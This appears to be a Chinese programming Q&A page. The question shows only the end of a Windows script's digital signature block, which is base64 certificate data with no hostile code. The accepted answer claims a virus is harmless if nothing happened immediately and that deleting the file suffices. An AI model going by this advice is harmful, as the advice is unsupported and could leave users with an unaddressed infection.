'' SIG '' aN675F1KPDAiMGkz7MKnJS7JIT3yithZwuEppz1Yq3aa
'' SIG '' za57G4QNxDAf8xukOBbrVsaXbR2rsnnyyhHS5F/WBTxS
'' SIG '' D1Ifxp4VpX6+n6lXFllVcq9ok3DCsrp1mWpzMpTREEQQ
'' SIG '' Lt+C8weE5nQ7bXHiLQwb7iDVySAdYyktzuxeTsiT+CFh
'' SIG '' mzTrBcZe7FsavOvJz82sNEBfsXpm7nfISKhmV1efVFiO
'' SIG '' DCu3T6cw2Vbuyntd463JT17lNecxy9qTXtyOj4DatpGY
'' SIG '' QJB5w3jHtrHEtWoYOAMQjdjUN6QuBX2I9YI+EJFwq1WC
'' SIG '' QTLX2wRzKm6RAXwhTNS8rhsDdV14Ztk6MUSaM0C/CNda
'' SIG '' SaTC5qmgZ92kJ7yhTzm1EVgX9yRcRo9k98FpiHaYdj1Z
'' SIG '' XUJ2h4mXaXpI8OCiEhtmmnTK3kse5w5jrubU75KSOp49
'' SIG '' 3ADkRSWJtppEGSt+wJS00mFt6zPZxd9LBADMfRyVw4/3
'' SIG '' IbKyEbe7f/LVjHAsQWCqsWMYRJUadmJ+9oCw++hkpjPR
'' SIG '' iQfhvbfmQ6QYuKZ3AeEPlAwhHbJUKSWJbOUOUlFHdL4m
'' SIG '' rLZBdd56rF+NP8m800ERElvlEFDrMcXKchYiCd98THU/
'' SIG '' Y+whX8QgUWtvsauGi0/C1kVfnSD8oR7FwI+isX4KJpn1
'' SIG '' 5GkvmB0t9dmpsh3lGwIDAQABo4IBOjCCATYwDwYDVR0T
'' SIG '' AQH/BAUwAwEB/zAdBgNVHQ4EFgQU7NfjgtJxXWRM3y5n
'' SIG '' P+e6mK4cD08wHwYDVR0jBBgwFoAUReuir/SSy4IxLVGL
'' SIG '' p6chnfNtyA8wDgYDVR0PAQH/BAQDAgGGMHkGCCsGAQUF
'' SIG '' BwEBBG0wazAkBggrBgEFBQcwAYYYaHR0cDovL29jc3Au
'' SIG '' ZGlnaWNlcnQuY29tMEMGCCsGAQUFBzAChjdodHRwOi8v
'' SIG '' Y2FjZXJ0cy5kaWdpY2VydC5jb20vRGlnaUNlcnRBc3N1
'' SIG '' cmVkSURSb290Q0EuY3J0MEUGA1UdHwQ+MDwwOqA4oDaG
'' SIG '' NGh0dHA6Ly9jcmwzLmRpZ2ljZXJ0LmNvbS9EaWdpQ2Vy
'' SIG '' dEFzc3VyZWRJRFJvb3RDQS5jcmwwEQYDVR0gBAowCDAG
'' SIG '' BgRVHSAAMA0GCSqGSIb3DQEBDAUAA4IBAQBwoL9DXFXn
'' SIG '' OF+go3QbPbYW1/e/Vwe9mqyhhyzshV6pGrsi+IcaaVQi
'' SIG '' 7aSId229GhT0E0p6Ly23OO/0/4C5+KH38nLeJLxSA8hO
'' SIG '' 0Cre+i1Wz/n096wwepqLsl7Uz9FDRJtDIeuWcqFItJnL
'' SIG '' nU+nBgMTdydE1Od/6Fmo8L8vC6bp8jQ87PcDx4eo0kxA
'' SIG '' GTVGamlUsLihVo7spNU96LHc/RzY9HdaXFSMb++hUD38
'' SIG '' dglohJ9vytsgjTVgHAIDyyCwrFigDkBjxZgiwbJZ9VVr
'' SIG '' zyerbHbObyMt9H5xaiNrIv8SuFQtJ37YOtnwtoeW/VvR
'' SIG '' XKwYw02fc7cBqZ9Xql4o4rmUMYIDdjCCA3ICAQEwdzBj
'' SIG '' MQswCQYDVQQGEwJVUzEXMBUGA1UEChMORGlnaUNlcnQs
'' SIG '' IEluYy4xOzA5BgNVBAMTMkRpZ2lDZXJ0IFRydXN0ZWQg
'' SIG '' RzQgUlNBNDA5NiBTSEEyNTYgVGltZVN0YW1waW5nIENB
'' SIG '' AhAMTWlyS5T6PCpKPSkHgD1aMA0GCWCGSAFlAwQCAQUA
'' SIG '' oIHRMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAc
'' SIG '' BgkqhkiG9w0BCQUxDxcNMjIxMTA4MjMzNTE1WjArBgsq
'' SIG '' hkiG9w0BCRACDDEcMBowGDAWBBTzhyJNhjOCkjWplLy9
'' SIG '' j5bp/hx8czAvBgkqhkiG9w0BCQQxIgQgj4P2QjO2zqJ2
'' SIG '' Eiqqc6Xe0rmTwOL9WOhQO/A6JYbW780wNwYLKoZIhvcN
'' SIG '' AQkQAi8xKDAmMCQwIgQgx/ThvjIoiSCr4iY6vhrE/E/m
'' SIG '' eBwtZNBMgHVXoCO1tvowDQYJKoZIhvcNAQEBBQAEggIA
'' SIG '' N4a6/PqXZ20xn5mtXpXGWnRHDSZmznxZ5uzEhJYQjFMQ
'' SIG '' H6/tV8EIlSuOD4ubAQ2srfTxER8/KUYtUjo5CmhBFQ9y
'' SIG '' N6eTJMdM2aZEFMBZZBUdB/6Uahs697pg6ZN9yXJLP8/G
'' SIG '' 8LzIMFv5MrYGguVHMnLftBPGEqOll8IUwQHEu/jziluB
'' SIG '' SAMWDQCdhq+VGkbeo8JUN1nbGr9/KXIp8rZ3ORobWFe2
'' SIG '' d/CKlq2TgAAZ9QAPROg8Mpht8+G8tEpkP9vP0aB+wDoy
'' SIG '' dlruYRaobgZd4T7hsoeVeWN2lL9PLCV1FpCNKX0Pg05y
'' SIG '' MvXrldob51CzHTPPHde0buH3KJBJoRafMv5VMHGvaNNS
'' SIG '' nOq1WXI44Zqw7/y7Ji++nCaIU9ITLjr5qLfPLgXqDWAa
'' SIG '' hbwfLRagQ3rk9Px+r6V22ApHzHtGmGKnHhgZAI+MJ7HN
'' SIG '' Zc8Oh65qU1uQ2vsUq5fy3pbEuIRfZmn6AG9zMqsjqw3G
'' SIG '' 30pMnbSImYkKyTIb+jWC8vyLJqbirUaxpk+Iu4Mm9+ot
'' SIG '' VV+6Ci3UgBssODRdSE9S3aKzGUbRFuWiriYVZxM/RJKM
'' SIG '' qaP4cnqoAXvTuMv1zU1Iz3han3MQyD3CjAVd0BM5D0m/
'' SIG '' OsomA1SK4FAVM6qaPsD444jVIVzPRNP0b5Kc0P8ER6Q/
'' SIG '' HZvKs+BJqvWmPixPXGt6+KA=
'' SIG '' End signature block


  • 写回答

3条回答 默认 最新

  • 开朗的狗头君 2022-12-20 12:30
    关注

    如果当场没有什么异常,现在就不要管他了,这个病毒内容不是长期的,短期没事就不要管他,源文件删掉就好了

    本回答被题主选为最佳回答 , 对您是否有帮助呢?
    评论
查看更多回答(2条)

报告相同问题?

问题事件

  • 系统已结题 1月3日
  • 已采纳回答 12月26日
  • 创建了问题 11月10日

悬赏问题

  • ¥170 如图所示配置eNSP
  • ¥20 docker里部署springboot项目,访问不到扬声器
  • ¥15 netty整合springboot之后自动重连失效
  • ¥15 悬赏!微信开发者工具报错,求帮改
  • ¥20 wireshark抓不到vlan
  • ¥20 关于#stm32#的问题:需要指导自动酸碱滴定仪的原理图程序代码及仿真
  • ¥20 设计一款异域新娘的视频相亲软件需要哪些技术支持
  • ¥15 stata安慰剂检验作图但是真实值不出现在图上
  • ¥15 c程序不知道为什么得不到结果
  • ¥15 键盘指令混乱情况下的启动盘系统重装